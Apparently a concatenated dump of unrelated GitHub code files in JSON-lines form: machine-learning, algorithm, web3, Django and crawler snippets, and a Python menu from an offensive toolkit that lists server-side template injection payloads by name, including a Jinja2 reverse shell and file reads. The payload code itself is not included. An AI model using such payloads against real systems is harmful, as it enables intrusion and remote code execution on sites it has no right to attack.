boolean_to_binary(df_complete)\r\n\r\n if impute_lcv:\r\n df_complete = lcv_na_to_median(df_complete)\r\n\r\n if impute_paralogs:\r\n df_complete = paralogs_na_to_median(df_complete)\r\n # df_complete = paralogs_ratio_to_1(df_complete)\r\n\r\n if na_is_zero:\r\n df_complete = na_to_zero(df_complete, list(df_complete.columns.values)[:num_features])\r\n\r\n if network_na_is_zero:\r\n\r\n cols = list(df_complete.columns.values)\r\n cols_to_impute = [s for s in cols if 'num' in s]\r\n\r\n df_complete = na_to_zero(df_complete, cols_to_impute)\r\n\r\n if power_transform_expression_data:\r\n df_complete = power_transform_expression(df_complete)\r\n\r\n if scale_data:\r\n scaler = preprocessing.MinMaxScaler(feature_range=(-1, 1))\r\n df_complete.iloc[:, :num_features] = scaler.fit_transform(df_complete.iloc[:, :num_features])\r\n\r\n if iterative_impute:\r\n df_complete.iloc[:, :num_features] = IterativeImputer(max_iter=10,\r\n tol=0.01,\r\n verbose=2,\r\n initial_strategy=\"median\",\r\n n_nearest_features=100,\r\n # sample_posterior=True,\r\n random_state=0).fit_transform(df_complete.iloc[:,\r\n :num_features])\r\n\r\n # test dataset for NaNs and non-finits\r\n mat = df_complete.iloc[:, :num_features]\r\n print(np.any(np.isnan(mat)))\r\n print(np.all(np.isfinite(mat)))\r\n\r\n df_complete.to_csv('%s/df_complete_dataset_ready_adapted_no_missing_values.csv' % results_dir)\r\n\r\n else:\r\n df_complete, num_features = load_adapted_dataset(results_dir)\r\n\r\n if keep_features:\r\n\r\n df_complete, num_features = keep_features_containing(df_complete, features_to_keep, num_features)\r\n\r\n print(df_complete)\r\n\r\n print('new num_features:', num_features)\r\n\r\n df_complete.to_csv('%s/df_complete_dataset_ready_adapted_no_missing_values.csv' % results_dir)\r\n\r\n return\r\n","repo_name":"eyalsim/trace","sub_path":"src/prepare_trace_dataset.py","file_name":"prepare_trace_dataset.py","file_ext":"py","file_size_in_byte":9614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"2660052794","text":"\"\"\"\nMain entrance to commandline actions\n\"\"\"\nimport click\n\nfrom optimus.cli.version import version_command\nfrom optimus.cli.startproject import startproject_command\nfrom optimus.cli.build import build_command\nfrom optimus.cli.watch import watch_command\nfrom optimus.cli.po import po_command\nfrom optimus.cli.runserver import runserver_command\nfrom optimus.logs import init_logger\n\n\n# Help alias on '-h' argument\nCONTEXT_SETTINGS = dict(help_option_names=[\"-h\", \"--help\"])\n\n# Default logger conf\nOPTIMUS_LOGGER_CONF = (\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\", None)\n\n\n@click.group(context_settings=CONTEXT_SETTINGS)\n@click.option(\n \"-v\",\n \"--verbose\",\n type=click.IntRange(min=0, max=5),\n default=4,\n metavar=\"INTEGER\",\n help=(\n \"An integer between 0 and 5, where '0' make a totaly silent output and '5' \"\n \"set level to DEBUG (the most verbose level). Default to '4' (Info level).\"\n ),\n)\n@click.option(\n \"--test-env\",\n is_flag=True,\n hidden=True,\n help=(\n \"Just an option to run for test and enable some specific tricks to run \"\n \"correctly\"\n ),\n)\n@click.pass_context\ndef cli_frontend(ctx, verbose, test_env):\n \"\"\"\n Optimus is a static site builder using Jinja2, webassets and Babel.\n \"\"\"\n printout = True\n if verbose == 0:\n verbose = 1\n printout = False\n\n # Verbosity is the inverse of logging levels\n levels = [item for item in OPTIMUS_LOGGER_CONF]\n levels.reverse()\n # Init the logger config\n root_logger = init_logger(levels[verbose], printout=printout)\n\n # Init the default context that will be passed to commands\n ctx.obj = {\n \"verbosity\": verbose,\n \"logger\": root_logger,\n \"test_env\": test_env,\n }\n\n\n# Attach commands methods to the main grouper\ncli_frontend.add_command(version_command, name=\"version\")\ncli_frontend.add_command(startproject_command, name=\"init\")\ncli_frontend.add_command(build_command, name=\"build\")\ncli_frontend.add_command(watch_command, name=\"watch\")\ncli_frontend.add_command(po_command, name=\"po\")\ncli_frontend.add_command(runserver_command, name=\"runserver\")\n","repo_name":"sveetch/Optimus","sub_path":"optimus/cli/console_script.py","file_name":"console_script.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"21627011450","text":"import sys\n\nsys.setrecursionlimit(10 ** 5 + 1)\n\ndef dfs(i, V, E):\n for k in E[i].keys():\n if V[k] >= 0:\n continue\n if E[i][k] % 2:\n V[k] = 1 - V[i]\n else:\n V[k] = V[i]\n V = dfs(k, V, E)\n return V\n\nn = int(input())\nE = {}\nfor i in range(n - 1):\n ui, vi, wi = map(int, input().split())\n if ui in E.keys():\n E[ui][vi] = wi\n else:\n E[ui] = {vi: wi}\n if vi in E.keys():\n E[vi][ui] = wi\n else:\n E[vi] = {ui: wi}\nV = [-1 for _ in range(n + 1)]\nV[1] = 0\nV = dfs(1, V, E)\nfor vi in V[1:]:\n print(vi)\n","repo_name":"mgmk2/atcoder-python","sub_path":"ABC/126/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"37665496232","text":"\nfrom keras.models import load_model\nfrom keras.initializers import glorot_uniform\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import SGD\nfrom keras.layers import Dropout\nimport tensorflow.keras.backend as K\n#from tensorflow import set_random_seed\nimport random\nimport numpy as np\nimport tensorflow as tf\nimport keras\nfrom keras.initializers import Constant\nfrom tqdm import tqdm_notebook as tqdm\nfrom Data_Tools import *\nfrom utils import *\nimport time\n\n\ndef Pz_keras(y_pred):\n '''\n Top1 probability, described in the original ListNet paper\n '''\n\n return K.exp(y_pred)/K.sum(K.exp(y_pred))\n\n\ndef Loss_query_keras(y,y_pred):\n\n '''\n Cross entropy with top 1 probability,\n \n\n Careful, if values of y, are greater than 1000, there is risk of a numerical error,\n and the vector has to be scaled\n Following a form like:\n \n #ratio=50\n #y_pred=(y_pred-K.min(y_pred))*ratio/(K.max(y_pred)-K.min(y_pred))\n #y=(y-K.min(y))*ratio/(K.max(y)-K.min(y))\n ''' \n\n return -K.sum(Pz_keras(y)*K.log(Pz_keras(y_pred)))\n\ndef set_libraries_seeds(my_seed=1):\n '''\n Sets the random seeds of all the envirionments we use, to a constant.\n '''\n np.random.seed(my_seed) # NumPy\n random.seed(my_seed) # Python\n (my_seed) # Tensorflow\n\ndef load_models(model_names,path):\n '''\n Loads a pretrained ListNet Model list. \n ''' \n model_list=[]\n for m in (model_names):\n #load model\n path_model=path+m\n #The costum_objects parameter is very important. Otherwise keras will not understand the loss function. Nor the initializers used for the layers.\n modelq = load_model(path_model, custom_objects={'Loss_query_keras': Loss_query_keras,\n 'GlorotUniform': glorot_uniform()})\n model_list.append(modelq)\n print('Model Successfully Loaded')\n \n return model_list\n\ndef load_model_LTR(model_path):\n '''\n Loads a pretrained ListNet Model. \n ''' \n \n #The costum_objects parameter is very important. Otherwise keras will not understand the loss function. Nor the initializers used for the layers.\n modelq = load_model(model_path, custom_objects={'Loss_query_keras': Loss_query_keras,\n 'GlorotUniform': glorot_uniform()})\n\n return modelq\n\ndef create_model(number_of_features,\n optimizer,\n initializer=tf.keras.initializers.glorot_uniform(seed=1),\n neurons_per_layer=[1],\n activation_function='relu',\n final_activation='sigmoid',\n dropout=0,\n bias=0.1):\n modelq = Sequential()\n modelq.add(Dense(neurons_per_layer[0], \n input_dim=number_of_features,\n activation=activation_function,\n kernel_initializer=initializer,\n bias_initializer=Constant(value=bias)))\n if(neurons_per_layer[0]>1):\n modelq.add(Dropout(dropout))\n if(len(neurons_per_layer)>1 or neurons_per_layer[-1]>1):\n for neurons in neurons_per_layer[1:]:\n modelq.add(Dense(neurons, activation=activation_function,\n kernel_initializer=initializer,\n bias_initializer=Constant(value=bias)))\n modelq.add(Dropout(dropout))\n \n modelq.add(Dense(1, activation=final_activation,\n kernel_initializer=initializer,\n bias_initializer=Constant(value=bias)))\n \n modelq.compile(loss=Loss_query_keras, optimizer=optimizer)\n return modelq\n\ndef generate_predictions_grid(path,\n data_vali,\n data_train,\n data_test,\n x_list_train,\n y_list_train,\n epochs=[50],\n learning_rate=[0.075],\n mon=[0.5],\n act=['relu'],\n number_neurons=[1],\n dropout=[0.5],\n final_activ=['linear'],\n hidden_layers=[0],\n name='',\n index=0.5,\n decresing_architecture=False,\n show_summary=False,\n save_model=False):\n\n t_ini=time.time()\n total_it=len(epochs)*len(learning_rate)*len(mon)*\\\n len(act)*len(number_neurons)*len(dropout)*\\\n len(final_activ)*len(hidden_layers)\n\n print(\"\\n\\n\\nName of predictions will be of form: \"+\\\n name+\",\\nwith starting at\",index,\n \"finishing at\",index+total_it-1,\"\\n\\n\\n_\")\n name_orig=name\n\n counter=1\n for my_iter in (product(epochs,learning_rate,mon,act,number_neurons,\n dropout,final_activ,hidden_layers)):\n name=name_orig+str(index)\n n_iter=my_iter[0]\n n_=my_iter[1]\n mom_=my_iter[2]\n act_=my_iter[3]\n n_neurons_=my_iter[4]\n dropout_=my_iter[5]\n final_act=my_iter[6]\n hidden_layers_=my_iter[7]\n opt = SGD(lr=n_, momentum=mom_)\n if(hidden_layers_>0):\n\n\t neurons_per_layer=np.repeat(n_neurons_,hidden_layers_)\n\t if(decresing_architecture):\n\t neurons_per_layer=np.array([neuron//2**index for index,neuron in \\\n\t enumerate(neurons_per_layer)])\n\t neurons_per_layer=neurons_per_layer[neurons_per_layer>1]\n else:\n \tneurons_per_layer=[n_neurons_]\n\n\n modelq=create_model(optimizer=opt,\n number_of_features=x_list_train[0].shape[1],\n neurons_per_layer=neurons_per_layer,\n activation_function=act_,\n final_activation=final_act,\n dropout=dropout_)\n if(show_summary):\n display(modelq.summary())\n\n\n for j in tqdm(range(n_iter)):\n\n for ki in range(len(y_list_train)):\n if final_act=='sigmoid':\n loss_qi=modelq.train_on_batch(x=x_list_train[ki],y=y_list_train[ki]/2)\n else:\n loss_qi=modelq.train_on_batch(x=x_list_train[ki],y=y_list_train[ki])\n\n print(\"Iteration:\",counter,\"/\",total_it)\n print(\"Time elapsed so far:\")\n print(convert_to_time(time.time()-t_ini))\n print(my_iter,\"\\n\\n\\n\")\n if(save_model):\n modelq.save(path+'models/model_'+name+'.h5')\n index+=1\n counter+=1\n\n y_pred_train=modelq.predict(data_train.drop(['relevance degree','qid'],axis=1)).astype('float64').ravel()\n df_train=pd.DataFrame(y_pred_train)\n df_train.to_csv(path+'predictions/y_train_'+name+'.txt',sep=' ',header=False,index=False)\n\n y_pred_vali=modelq.predict(data_vali.drop(['relevance degree','qid'],axis=1)).astype('float64').ravel()\n df_vali=pd.DataFrame(y_pred_vali)\n df_vali.to_csv(path+'predictions/y_vali_'+name+'.txt',sep=' ',header=False,index=False)\n\n y_pred_test=modelq.predict(data_test.drop(['relevance degree','qid'],axis=1)).astype('float64').ravel()\n df_test=pd.DataFrame(y_pred_test)\n df_test.to_csv(path+'predictions/y_test_'+name+'.txt',sep=' ',header=False,index=False)\n\n\ndef convert_to_time(seconds): \n return time.strftime(\"(Hours:Minutes:Seconds)\\n%H:%M:%S\", time.gmtime(seconds)) \n\n\n\n\n\n\n","repo_name":"francelabs/ListNetReproducibilityStudy","sub_path":"code/LTR4L analysis/Deep_Learning_Tools.py","file_name":"Deep_Learning_Tools.py","file_ext":"py","file_size_in_byte":7673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"3997383675","text":"#Дан файл инпута, надо считать строки и вывести йес, если каждая послед строка\r\n# длиннее предыдущей, иначе ноу, и вывод в файл аутпута сделать\r\n\r\na = list(map(str,input().split()))\r\nok = True\r\nfor i in range(1,len(a)):\r\n if len(a[i-1]) > len(a[i]):\r\n ok = False\r\n break\r\nif ok:\r\n print(\"Yes\")\r\nelse: \r\n print(\"NO\") ","repo_name":"araytemirkhann/Python_","sub_path":"python_code/98.py","file_name":"98.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"1449300099","text":"import unittest\r\nfrom os import path\r\n\r\nfrom graph import Graph\r\nfrom graph.algorithms import prim\r\nfrom graph.reader import Reader\r\n\r\nclass TestMinimumSpanningTree(unittest.TestCase):\r\n\r\n @classmethod\r\n def setUpClass(self):\r\n\r\n arquivo = path.join(\"datasets\", \"osti\", \"b01.stp\")\r\n\r\n reader = Reader()\r\n\r\n self.stp = reader.parser(arquivo)\r\n\r\n self.graph = Graph(vertices=self.stp.nro_nodes,edges=self.stp.graph)\r\n\r\n def test_mst_cost(self):\r\n start_node = 34\r\n _, cost = prim(self.graph,start_node)\r\n\r\n self.assertGreater(cost,0)\r\n self.assertEqual(cost,238)\r\n\r\n\r\nif __name__ == \"__main__\" :\r\n unittest.main()","repo_name":"GiliardGodoi/binary-ga-stpg","sub_path":"graph/test/test_mst.py","file_name":"test_mst.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"2028327811","text":"__author__ = 'gregor'\n\nimport numpy as np\n\n\ndef cluster_points(X, mu):\n clusters = {}\n for x in X:\n bestmukey = min([(i[0], np.linalg.norm(x - mu[i[0]])) for i in enumerate(mu)], key=lambda t: t[1])[0]\n try:\n clusters[bestmukey].append(x)\n except KeyError:\n clusters[bestmukey] = [x]\n return clusters\n\n\ndef reevaluate_centers(mu, clusters):\n newmu = []\n keys = sorted(clusters.keys())\n for k in keys:\n newmu.append(np.mean(clusters[k], axis=0))\n return newmu\n\n\ndef has_converged(mu, oldmu):\n return set([tuple(a) for a in mu]) == set([tuple(a) for a in oldmu])\n\n\ndef find_centers(X, K):\n # Initialize to K random centers\n idx = np.random.randint(len(X), size=K)\n oldmu = X[idx, :]\n idx = np.random.randint(len(X), size=K)\n mu = X[idx, :]\n while not has_converged(mu, oldmu):\n oldmu = mu\n # Assign all points in X to clusters\n clusters = cluster_points(X, mu)\n # Reevaluate centers\n mu = reevaluate_centers(oldmu, clusters)\n return (mu, clusters)\n\n\n# -------------------------------------------------------------------------------------------\ndef init_board(N):\n X = np.array([(np.random.uniform(-1, 1), np.random.uniform(-1, 1)) for i in range(N)])\n return X\n\n\ndef init_board_gauss(N, k):\n n = float(N) / k\n X = []\n for i in range(k):\n c = (np.random.uniform(-1, 1), np.random.uniform(-1, 1))\n s = np.random.uniform(0.05, 0.5)\n x = []\n while len(x) < n:\n a, b = np.array([np.random.normal(c[0], s), np.random.normal(c[1], s)])\n # Continue drawing points from the distribution in the range [-1,1]\n if abs(a) < 1 and abs(b) < 1:\n x.append([a, b])\n X.extend(x)\n X = np.array(X)[:N]\n return X\n\n\ndef init_board_gauss3d(N, k):\n n = float(N) / k\n X = []\n for i in range(k):\n c = (np.random.uniform(-1, 1), np.random.uniform(-1, 1), np.random.uniform(-1, 1))\n s = np.random.uniform(0.05, 0.5)\n x = []\n while len(x) < n:\n a, b, d = np.array([np.random.normal(c[0], s), np.random.normal(c[1], s), np.random.normal(c[2], s)])\n # Continue drawing points from the distribution in the range [-1,1]\n if abs(a) < 1 and abs(b) < 1 and abs(d) < 1:\n x.append([a, b, d])\n X.extend(x)\n X = np.array(X)[:N]\n return X\n\n\ndef plot_results(colors, mu, clusters, ax):\n for col, center, k in zip(colors, mu, [x for x in range(0, 5)]):\n ax.scatter(np.asarray(clusters[k])[:, 1], np.asarray(clusters[k])[:, 2], c=col)\n ax.scatter(center[1], center[2], c=\"#000000\", marker=\"x\", s=250, linewidth='3')\n","repo_name":"gbanusi/lloyd-clustering-alg","sub_path":"Nebitno/LloydAlg.py","file_name":"LloydAlg.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"12486604127","text":"import web3\nimport json\n\n\nclass House:\n w3 = web3.Web3(web3.HTTPProvider('http://127.0.0.1:7545'))\n\n user_address = None\n\n with open('abi.json') as abifile:\n abi = json.load(abifile)\n\n with open('contract.txt') as file:\n contract_address = file.read()\n\n cntr = w3.eth.contract(\n address=contract_address,\n abi=abi\n )\n\n def auth(self, login):\n try:\n login = web3.Web3.toChecksumAddress(login)\n except Exception:\n return False\n else:\n self.user_address = web3.Web3.toChecksumAddress(login)\n log = self.w3.personal.unlockAccount(self.user_address, '1')\n self.w3.eth.defaultAccount = self.user_address\n return log\n\n def get_accounts(self):\n return self.w3.eth.accounts\n\n def get_admin(self):\n return self.cntr.call().admin()\n\n def reg_home(self, owner, address, square, period):\n owner = web3.Web3.toChecksumAddress(owner)\n address = str(address)\n square = int(square)\n period = int(period)\n self.cntr.functions.reg_home(owner, address, square, period).transact()\n\n def create_sale(self, ID_home, price):\n ID_home = int(ID_home)\n price = int(price)*(10**18)\n print('set price: %d' %price)\n self.cntr.functions.create_sale(ID_home, price).transact()\n\n def buy(self, ID_sale, price):\n ID_sale = int(ID_sale)\n price = web3.Web3.toWei(int(price), 'ether')\n self.cntr.functions.buy(ID_sale).transact({'value': price})\n\n def stop_sale(self, ID_sale):\n ID_sale = int(ID_sale)\n self.cntr.functions.stop_sale(ID_sale).transact()\n\n def get_home(self, ID_home):\n ID_home = int(ID_home)\n return self.cntr.functions.get_home(ID_home).call()\n\n def get_sale(self, ID_sale):\n ID_sale = int(ID_sale)\n return self.cntr.functions.get_sale(ID_sale).call()\n\n def get_homes_amount(self):\n return self.cntr.functions.get_homes_amount().call()\n\n def get_sales_amount(self):\n return self.cntr.functions.get_sales_amount().call()\n\n\n# h = House()\n# h.auth('0x356D7630B61EC74A4562E9CA5d464B406d754a52')\n# h.reg_home('0x627117c3bB529B18c50e4aFF24350C4B6deA594E', 'Петровская, 50', 70, 5)\n# h.reg_home('0xA969d347ae987E66d71e55500f10b1b52A07cdc9', 'Александровская, 127', 60, 8)\n# h.reg_home('0xA969d347ae987E66d71e55500f10b1b52A07cdc9', 'Чехова, 203', 230, 3)\n","repo_name":"ShamilyanOksana/ocean","sub_path":"house.py","file_name":"house.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"8903577926","text":"from django.core.exceptions import ValidationError\nfrom django.forms import ModelForm\nfrom django import forms\nfrom survey.forms.widgets import InlineRadioSelect\nfrom survey.models import Survey, BatchCommencement, SurveyHouseholdListing\n\n\nclass SurveyForm(ModelForm):\n # survey_listing = forms.CharField(choices=[(survey.pk, survey.name) for survey in Survey.objects.all()],\n # help_text='Select survey household listing to reuse. Leave empty for fresh listing',\n # required=False)\n class Meta:\n model = Survey\n fields = ['name', 'description', 'has_sampling', 'sample_size', 'preferred_listing']\n widgets = {\n 'description': forms.Textarea(attrs={\"rows\": 4, \"cols\": 50}),\n 'has_sampling': InlineRadioSelect(choices=((True, 'Sampled'), (False, 'Census')), attrs={'class' : 'has_sampling'}),\n }\n\n def __init__(self, *args, **kwargs):\n super(SurveyForm, self).__init__(*args, **kwargs)\n if kwargs.get('instance', None) and kwargs['instance'].has_sampling is False:\n self.fields['preferred_listing'].widget.attrs['disabled'] = 'disabled'\n else:\n preferred_listings = [('', '------ None, Create new -------'), ]\n survey_listings = SurveyHouseholdListing.objects.all()\n preferred_listings.extend(set([(l.survey.pk, l.survey.name) for l in survey_listings]))\n self.fields['preferred_listing'].choices = preferred_listings\n\n\n def clean(self):\n cleaned_data = self.cleaned_data\n\n has_sampling = cleaned_data.get('has_sampling', None)\n\n if has_sampling and not cleaned_data.get('sample_size', None):\n raise ValidationError('Sample size must be specified if has sampling is selected.')\n\n return cleaned_data\n\n def clean_name(self):\n name = self.cleaned_data['name']\n survey = Survey.objects.filter(name=name)\n instance_id = self.instance.id\n\n if not instance_id and survey:\n raise ValidationError(\"Survey with name %s already exist.\" % name)\n elif instance_id and survey and survey[0].id != instance_id:\n raise ValidationError(\"Survey with name %s already exist.\" % name)\n\n return self.cleaned_data['name']\n\n\n","repo_name":"ganeshbandhu/uSurvey","sub_path":"survey/forms/surveys.py","file_name":"surveys.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"14441478066","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\noptions = Options()\noptions.add_argument(\"--headless\")\ndriver = webdriver.Chrome('/home/zskyver/PycharmProjects/WebCrawler/chromedriver', chrome_options=options)\n\n\ndef buscador():\n busca = input(str(\"digite a sua busca: \"))\n busca.replace(\" \", \"%20\")\n driver.get(\"https://www.google.com/search?q=\" + busca)\n return driver\n\n\ndef tratamento_de_texto(buscador):\n links = []\n results = buscador.find_elements_by_class_name(\"g\")\n print(len(results))\n\n for i in range(len(results)):\n links.append(str(results[i].find_element_by_tag_name(\"a\").get_attribute(\"href\")))\n\n contador = 0\n\n\n for link in links:\n if link.__contains__(\"http\"):\n buscador.get(link)\n textos = buscador.find_elements_by_tag_name(\"p\")\n f = open(\"%s.txt\" % contador, \"w\")\n contador_paragrafos = 0\n for contador_paragrafos in range(len(textos)):\n f.write(textos[contador_paragrafos].text)\n contador = contador + 1\n f.close()\n print(\"Arquivo criado!\")\n buscador.quit()\n pass\n\n\ntratamento_de_texto(buscador())\n","repo_name":"zSkyver/webcrawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"43156501931","text":"#! /usr/bin/env python3\nimport os\nimport readline\nimport importlib\nfrom importlib import util\nimport xml.etree.ElementTree as ET\nspec = importlib.util.find_spec('.subserv', package='lib')\nm = spec.loader.load_module()\ntree = ET.parse('./src/sstiAttacks.xml')\nroot = tree.getroot()\n\n\ndef ListPayload():\n print(\"\\t**************************************************\\n\")\n print(m.bcolors.GREEN + m.bcolors.BOLD + m.bcolors.UNDERLINE +\"\\tHere is the List of possible SSTI Payloads\\n\" + m.bcolors.ENDC)\n for attack in root.findall('attack'):\n name = attack.find('name').text\n\n print(\"\\tName of SSTI Attack: \" + m.bcolors.ERROR + m.bcolors.BOLD + name + m.bcolors.ENDC)\n\n\n\ndef complete(text,state):\n\n ssti = (\n 'Ruby_Basic_ERB', 'Ruby_Basic_Slim', 'Ruby_Read_Files', 'Ruby_List_Directories', 'Java_Basic_1', 'Java_Basic_2',\n 'Java_Basic_getPath', 'Java_Basic_getContent', 'Java_Env_Var', 'Java_passwd_1', 'Java_passwd_2', 'Twig_Basic_1',\n 'Twig_Basic_2', 'Twig_File_Read', 'Smarty_Version', 'Smarty_C2', 'Freemarker_Basic_1', 'Freemarker_Basic_2',\n 'Freemarker_RCE_1', 'Freemarker_RCE_2', 'Freemarker_RCE_3', 'Pebble_Basic_1','Pebble_Basic_2','Pebble_RCE',\n 'JinJa2_Basic_1','JinJa2_Basic_2','JinJa2_File_Read','JinJa2_File_Write','JinJa2_POpen_Reverse_Shell',\n 'JinJava_Basic','JinJava_RCE','ASP_.NET_Razor','ASP_.NET_Razor_RCE'\n )\n options = [i for i in ssti if i.startswith(text)]\n if state < len(options):\n return options[state]\n else:\n return None\n\n\ndef PickPayload():\n readline.parse_and_bind(\"tab: complete\")\n readline.set_completer(complete)\n print(\"\\t**************************************************\\n\")\n choice = input(\"\\tWhich Payload do you want to use?: \")\n\n for attack in root.findall('attack'):\n name = attack.find('name').text\n code = attack.find('code').text\n desc = attack.find('desc').text\n if name == choice:\n print(\"\\tName of SSTI Attack: \" + m.bcolors.ERROR + m.bcolors.BOLD + name + m.bcolors.ENDC)\n print(\"\\n\\n\\tThe C0de is: \" + m.bcolors.ERROR + m.bcolors.BOLD + code + m.bcolors.ENDC)\n print(\"\\n\\n\\tDescription of attack: \" + m.bcolors.ERROR + m.bcolors.BOLD + desc + m.bcolors.ENDC)\n input(\"Press any key to go back to the menu!\")\n\ndef SSTI():\n os.system(\"clear\")\n while (1):\n print(m.bcolors.BLUE + \"\\t*******************************************************************\" + m.bcolors.ENDC)\n print(m.bcolors.BOLD + m.bcolors.GREEN + \"\"\"\n *******************************************************************\n _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ \n / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ \n ( S | S | T | I ) ( P | a | y | l | o | a | d ) ( M | e | n | u )\n \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \n \"\"\" + m.bcolors.ENDC)\n\n print(\n m.bcolors.ERROR + \"\\t*******************************************************************\" + m.bcolors.ENDC)\n print(\"\\t(1)\\tList SSTI Payloads\")\n print(\"\\t(2)\\tPick SSTI Payload\")\n print(\"\\t(99)\\tGo back to the Custom Main Menu\")\n print(m.bcolors.BLUE + \"\\t*******************************************************************\" + m.bcolors.ENDC)\n\n options = input(\"\\nW4@+ Payload R U W@^t1ng Broliath: \")\n if options == \"1\":\n ListPayload()\n elif options == \"2\":\n PickPayload()\n elif options == \"99\":\n os.system(\"clear\")\n break\n else:\n input(\"GO CHIEFS! Come on pick something... \")\n\n","repo_name":"Marantral/aMALgamous","sub_path":"Mod/Web/SSTI/ssti.py","file_name":"ssti.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"29"} +{"seq_id":"42849793421","text":"class Graph:\n def __init__(self, data):\n # create graph\n # convert lines data to graph\n self.data = convertToGraph(data)\n self.count = len(data)\n\n\ndef topologicalSort(data, result):\n # base, if dictionary is empty, result\n if len(data) == 0:\n return result\n\n # local result, conquer this sub problem\n res = []\n # check for empty prerequisite node (we can register to this course in this semester)\n for key in data:\n # if empty\n if (len(data[key]) == 0):\n # add to local result\n res.append(key)\n\n # decrease dictionary\n # for every course in local result\n for key in res:\n # for every course available in the dictionary\n for item in data:\n # if the data is in local result and also a prerequisite in another course\n if key in data[item]:\n # remove the prerequisite node as we are taking the course this semester\n data[item].remove(key)\n # remove the key, as the course has been taken\n del data[key]\n\n # add local result to global result\n result.append(res)\n\n # recursive to every sub problem\n # with smaller data, and bigger global result\n return topologicalSort(data, result)\n\n\ndef convertToGraph(lines):\n # make dictionary\n result = {}\n for line in lines:\n # process every line, so there is no spaces, dot, and split to list\n line = processLine(line)\n # course\n node = line[0]\n # prerequisite course\n # set dictionary key to be course, and value list of prerequisite course\n result[node] = line[1:]\n\n return result\n\n\ndef processLine(line):\n # remove spaces\n line = line.replace(\" \", \"\")\n # remove .\n line = line.replace(\".\", \"\")\n # convert to list\n line = line.split(\",\")\n return line\n","repo_name":"frederon/Stima_Tucil2","sub_path":"Graph_13519134.py","file_name":"Graph_13519134.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71019333519","text":"class Buku :\n def __init__(self, Judul, Pengarang, Penerbit, Tahun) :\n self.Judul = Judul \n self.Pengarang = Pengarang \n self.Penerbit = Penerbit \n self.Tahun = Tahun \n\n def tampil(self) :\n print(\"Judul : \",self.Judul)\n print(\"Pengarang : \",self.Pengarang)\n print(\"Penerbit : \",self.Penerbit)\n print(\"Tahun : \",self.Tahun)","repo_name":"robbyakakom/20221","sub_path":"PBP-SIA-1/pertemuan_7/Buku.py","file_name":"Buku.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"id","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"7574335949","text":"import sys,getopt\r\n\r\ndef main (argv):\r\n InputCondensedFileName = \"\"\r\n OutputCondensedMergedResults = \"\"\r\n print(\"It works\")\r\n\r\n try:\r\n opts, args = getopt.getopt(argv,\"i:o:\",[\"inCondensedfile=\",\"outMergedresults=\"])\r\n except getopt.GetoptError:\r\n print ('cucu.py -i -o ')\r\n sys.exit(2)\r\n for opt, arg in opts:\r\n if opt == '-h':\r\n print ('cucu.py -i -o ')\r\n sys.exit()\r\n elif opt in (\"-i\", \"--inCondensedfile\"):\r\n InputCondensedFileName = arg\r\n elif opt in (\"-o\", \"--outMergedresults\"):\r\n OutputCondensedMergedResults = arg\r\n\r\n print(InputCondensedFileName)\r\n print(OutputCondensedMergedResults)\r\n\r\n inputFileSplit = open(InputCondensedFileName)\r\n outputFile = open(OutputCondensedMergedResults, 'a')\r\n\r\n FirstRow = \"\"\r\n SecondRow = \"\"\r\n ThirdRow = \"\"\r\n\r\n\r\n inputFileSplit.readline()\r\n\r\n FirstRow = inputFileSplit.readline()\r\n SecondRow = inputFileSplit.readline()\r\n ThirdRow = inputFileSplit.readline()\r\n\r\n FirstRowSubAcc = \"\"\r\n FirstRowSubTitle = \"\"\r\n FirstRowCountOfBestHits = \"\"\r\n FirstRowMeanBitScore = \"\"\r\n temporaryList = FirstRow.splitlines()\r\n singleString = temporaryList [0]\r\n splitingList = singleString.split('\\t')\r\n\r\n FirstRowSubAcc = splitingList[0]\r\n FirstRowSubTitle = splitingList[1]\r\n FirstRowCountOfBestHits = splitingList[2]\r\n FirstRowMeanBitScore = splitingList[3]\r\n \r\n temporaryList = SecondRow.splitlines()\r\n singleString = temporaryList [0]\r\n splitingList = singleString.split(\"\\t\")\r\n\r\n SecondRowSubAcc = splitingList[0]\r\n SecondRowSubTitle = splitingList[1]\r\n SecondRowCountOfBestHits = splitingList[2]\r\n SecondRowMeanBitScore = splitingList[3]\r\n \r\n temporaryList = ThirdRow.splitlines()\r\n singleString = temporaryList [0]\r\n splitingList = singleString.split(\"\\t\")\r\n\r\n ThirdRowSubAcc = splitingList[0]\r\n 